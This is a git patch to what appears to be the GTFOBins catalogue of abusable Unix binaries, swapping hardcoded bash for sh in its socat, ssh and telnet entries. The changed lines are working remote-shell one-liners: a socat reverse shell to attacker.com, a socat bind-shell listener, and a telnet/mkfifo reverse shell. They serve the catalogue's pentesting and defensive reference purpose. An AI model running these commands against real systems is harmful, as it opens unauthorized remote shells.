From 358628c2f291cc69f8e9dfb26be5a684a0fbf9e8 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Mon, 28 May 2018 17:47:54 +0200 Subject: [PATCH] Remove hardcoded instances of bash --- _gtfobins/socat.md | 4 ++-- _gtfobins/ssh.md | 2 +- _gtfobins/telnet.md | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/_gtfobins/socat.md b/_gtfobins/socat.md index e50102d..2e84b46 100644 --- a/_gtfobins/socat.md +++ b/_gtfobins/socat.md @@ -5,10 +5,10 @@ functions: code: | RHOST=attacker.com RPORT=12345 - socat tcp-connect:$RHOST:$RPORT exec:"bash -li",pty,stderr,setsid,sigint,sane + socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane bind-shell-interactive: - description: Run socat FILE:`tty`,raw,echo=0 TCP:target.com:12345 on the attacker box to connect to the shell. code: | LPORT=12345 - socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane + socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane --- diff --git a/_gtfobins/ssh.md b/_gtfobins/ssh.md index 774a9c2..c87a00d 100644 --- a/_gtfobins/ssh.md +++ b/_gtfobins/ssh.md @@ -2,7 +2,7 @@ functions: execute-interactive: - description: Reconnecting may help bypassing restricted shells. - code: ssh localhost /bin/bash --noprofile --norc + code: ssh localhost $SHELL --noprofile --norc download: - description: Fetch a remote file from a SSH server. code: | diff --git a/_gtfobins/telnet.md b/_gtfobins/telnet.md index bc48656..80946c8 100644 --- a/_gtfobins/telnet.md +++ b/_gtfobins/telnet.md @@ -15,7 +15,7 @@ functions: RPORT=12345 TF=$(mktemp) rm $TF - mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/bash 1>$TF + mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF sudo-enabled: - description: BSD version only. Needs to be connected first. code: |